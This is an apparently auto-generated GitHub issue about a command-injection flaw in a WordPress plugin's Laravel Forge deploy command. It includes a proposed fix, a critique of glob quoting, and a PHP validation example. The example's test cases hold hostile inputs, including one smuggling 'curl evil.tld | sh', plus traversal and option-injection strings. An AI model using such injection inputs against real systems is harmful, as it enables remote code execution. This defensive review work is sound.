
quality-debt: inc/integrations/host-providers/class-laravel-forge-host-provider.php — PR #318 review feedback (medium) #411

Description

@superdav42

Unactioned Review Feedback

Source PR: #318
File: inc/integrations/host-providers/class-laravel-forge-host-provider.php
Reviewers: coderabbit
Findings: 1
Max severity: medium


MEDIUM: coderabbit (coderabbitai[bot])

File: inc/integrations/host-providers/class-laravel-forge-host-provider.php:743
⚠️ Potential issue | 🟠 Major

Validate domain input before using in shell commands to prevent command injection.

The generated deploy command uses rm -rf with the domain name directly interpolated. While WordPress likely validates domain names, an attacker-controlled domain value could potentially contain shell metacharacters, leading to command injection.

Ensure the domain is properly validated and escaped before use in shell commands:

🔒 Proposed security fix
 } elseif (defined('WU_FORGE_SYMLINK_TARGET') && WU_FORGE_SYMLINK_TARGET) {
 	// Build symlink command if target is specified.
+	// Validate domain to prevent command injection
+	if (!preg_match('/^[a-z0-9][a-z0-9\-\.]*[a-z0-9]$/i', $domain)) {
+		wu_log_add(
+			'integration-forge',
+			sprintf('Invalid domain format for shell command: %s', $domain),
+			LogLevel::ERROR
+		);
+		return '';
+	}
+	
 	$target  = str_replace('{domain}', $domain, WU_FORGE_SYMLINK_TARGET);
 	$command = sprintf(
-		'rm -rf /home/forge/%s/* && ln -s %s /home/forge/%s/public',
-		$domain,
-		$target,
-		$domain
+		'rm -rf %s && ln -s %s %s',
+		escapeshellarg('/home/forge/' . $domain . '/*'),
+		escapeshellarg($target),
+		escapeshellarg('/home/forge/' . $domain . '/public')
 	);
 }
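Review bot: the replacement sprintf quotes the glob along with the path, and that defeats it: escapeshellarg('/home/forge/' . $domain . '/*') yields '/home/forge/example.com/*' in single quotes, so the shell does not expand `*` and rm -rf looks for a file literally named `*`; the site directory is left untouched before the symlink is created. Quote only the directory and keep the glob outside the quotes, for example `'rm -rf -- %s/* && ln -s -- %s %s'` with `escapeshellarg('/home/forge/' . $domain)` as the first argument (the `--` also stops a value beginning with `-` from being parsed as an option). Two smaller points: the `return '';` path assumes the caller treats an empty string as "no command to run" rather than executing it, which the hunk does not show, and the regex accepts consecutive dots (`a..b`) and unbounded length; since it excludes `/` this is not a traversal, but a per-label hostname pattern would be tighter.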

Committable suggestion skipped: line range outside the PR's diff.



Auto-generated by quality-feedback-helper.sh scan-merged. Review each finding and either fix the code or dismiss with a reason.
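The validate-then-quote approach the finding asks for, as an added PHP example: this is not code from PR #318 or from the plugin, and build_symlink_command, its parameters and the sample inputs are assumptions for illustration. It shows the two things that matter in practice: a hostname pattern that rejects every shell metacharacter before the value is touched, and quoting that keeps the `/*` glob outside escapeshellarg so the shell still expands it.

```php
<?php
// Added example (not code from PR #318 or the plugin). Names here are
// assumptions for illustration only.

declare(strict_types=1);

/**
 * Builds the deploy command for a Forge site, or returns null when the
 * domain is not a plain hostname and must not reach the shell at all.
 *
 * $targetTemplate may contain {domain}, as WU_FORGE_SYMLINK_TARGET does.
 */
function build_symlink_command(string $domain, string $targetTemplate, string $home = '/home/forge'): ?string
{
    // Hostname labels of letters, digits and hyphens, no leading/trailing
    // hyphen, dots only between labels, 253 chars total. This excludes
    // whitespace, "/", ";", "$", backticks and "..", so the value cannot
    // escape the quoting below or point outside $home.
    $hostname = '/^(?=.{1,253}$)(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))*$/i';
    if (!preg_match($hostname, $domain)) {
        return null;
    }

    $siteDir = $home . '/' . $domain;
    $target  = str_replace('{domain}', $domain, $targetTemplate);

    // Each path is one quoted argument. The glob stays outside the quotes:
    // escapeshellarg('/home/forge/x/*') would make rm look for a file
    // literally named "*". "--" ends option parsing for rm and ln.
    return sprintf(
        'rm -rf -- %s/* && ln -s -- %s %s',
        escapeshellarg($siteDir),
        escapeshellarg($target),
        escapeshellarg($siteDir . '/public')
    );
}

// Constructed sample inputs: two valid domains and four hostile ones.
$cases = [
    'example.com',
    'sub-site.example.co.uk',
    'example.com; curl evil.tld | sh',   // command injection attempt
    '../.ssh',                           // traversal attempt
    '-rf',                               // option injection attempt
    'bad..dots.example.com',             // empty label
];

foreach ($cases as $domain) {
    $cmd = build_symlink_command($domain, '/home/forge/shared/{domain}/current/public');
    printf("%-36s => %s\n", $domain, $cmd ?? 'REJECTED');
}
```

For a valid domain this prints a command of the form `rm -rf -- '/home/forge/example.com'/* && ln -s -- '/home/forge/shared/example.com/current/public' '/home/forge/example.com/public'`; the four hostile inputs are rejected by the pattern and never become part of a command. The regex and escapeshellarg are deliberately both present: the pattern is the control, and the quoting is the safety net should the pattern ever be loosened.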

Metadata

Assignees

Labels

- dispatched:sonnet (Task dispatched to sonnet model)
- priority:medium (Medium severity — moderate quality issue)
- quality-debt (Unactioned review feedback from merged PRs)
- source:review-feedback (Auto-created by quality-feedback-helper.sh)
- status:in-review (PR open, awaiting review/merge)
